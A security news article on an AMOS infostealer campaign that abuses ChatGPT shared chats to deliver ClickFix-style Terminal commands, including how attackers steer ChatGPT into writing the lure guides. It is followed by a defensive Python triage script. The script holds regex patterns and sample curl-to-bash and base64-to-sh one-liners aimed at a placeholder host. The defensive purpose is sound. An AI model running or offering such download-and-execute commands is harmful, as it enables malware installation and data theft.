
Cybercriminals have weaponized ChatGPT's legitimate chat-sharing feature to distribute the AMOS infostealer, creating a deceptively trustworthy infection vector that bypasses user skepticism by hosting malware instructions directly on OpenAI's official domain.
Kaspersky researchers uncovered the sophisticated campaign targeting macOS users searching for OpenAI's rumored Atlas browser. Attackers purchase Google ads that lead victims to chatgpt.com/share/ URLs—legitimate ChatGPT shared conversations that appear authoritative because they're hosted on the official website.
"What makes the attack so convincing is that the bait link leads to… the official ChatGPT website," Kaspersky experts noted in their analysis.
The threat actors use prompt engineering to manipulate ChatGPT into generating professional-looking installation guides, then sanitize the conversation history to remove suspicious exchanges. Victims see polished instructions for downloading "Atlas browser" that direct them to copy a command into Terminal—a classic ClickFix attack variation.
The malicious command downloads a script from atlas-extension{.}com that deploys AMOS (Atomic macOS Stealer), which harvests passwords, cookies, and data from Chrome and Firefox, from crypto wallets like Electrum and Exodus, and files from the Desktop, Documents, and Downloads folders. AMOS also installs a persistent backdoor for remote system control.
This exploitation of content-sharing features follows a troubling pattern. Attackers have previously abused Dropbox, Google Docs, GitHub, and Google Forms to host malicious content on trusted domains, leveraging legitimate platform credibility to lower victim defenses.
The campaign highlights emerging risks as AI tools proliferate. Users excited about new technology may lack experience in distinguishing legitimate AI interactions from social engineering attacks dressed in AI clothing.
Protection requires vigilance: Never execute commands from websites, messages, or shared documents—regardless of how official they appear. If instructions prompt you to open Terminal or PowerShell, treat it as a potential ClickFix attack. When uncertain about suspicious commands, paste them into ChatGPT itself to analyze their function before execution.
Security experts recommend deploying reliable anti-malware protection across all devices and maintaining healthy skepticism toward unsolicited technical instructions, even when hosted on seemingly trustworthy platforms.
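As an added example (not from Kaspersky's analysis or the original article), the script below statically triages a pasted Terminal one-liner for the download-and-execute shapes that ClickFix lures rely on. The rule set, function names and sample commands are assumptions constructed for illustration; nothing is executed or fetched.

```python
import re

# Interpreters that run whatever text they are handed.
INTERP = r"(?<![\w.-])(?:sudo\s+)?(?:(?:ba|z|da)?sh|python3?|perl|ruby|osascript)\b"
FETCH = r"\b(?:curl|wget)\b"

# Assumed rule set: three common "fetch remote text and run it" shapes.
RULES = [
    ("download piped into an interpreter",
     re.compile(FETCH + r"[^|;]*\|\s*" + INTERP)),
    ("download executed through command substitution",
     re.compile(INTERP + r"[^|;]*(?:\$\(|`)\s*" + FETCH)),
    ("base64-decoded text piped into an interpreter",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|;]*\|\s*" + INTERP)),
]

def refang(text):
    """Undo common defanging such as example{.}com or hxxps://."""
    text = re.sub(r"[\[{(]\.[\]})]", ".", text)
    return re.sub(r"\bhxxp", "http", text, flags=re.I)

def triage(command):
    """Statically inspect a pasted command; returns matched rules and URL hosts."""
    cmd = refang(command)
    findings = [name for name, rx in RULES if rx.search(cmd)]
    hosts = sorted({h.lower() for h in re.findall(r"https?://([^/\s\"'`)]+)", cmd)})
    return {"findings": findings, "hosts": hosts}

# Constructed samples (not taken from the campaign); .invalid never resolves.
SAMPLES = [
    "curl -fsSL https://downloads.example{.}invalid/install.sh | bash",
    '/bin/bash -c "$(curl -fsSL https://downloads.example.invalid/i.sh)"',
    "echo ZWNobyBoaQ== | base64 -D | sh",
    "brew install --cask firefox",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(triage(sample), "<-", sample)
```

An empty findings list only means none of these three shapes matched; it is not a verdict that the command is safe.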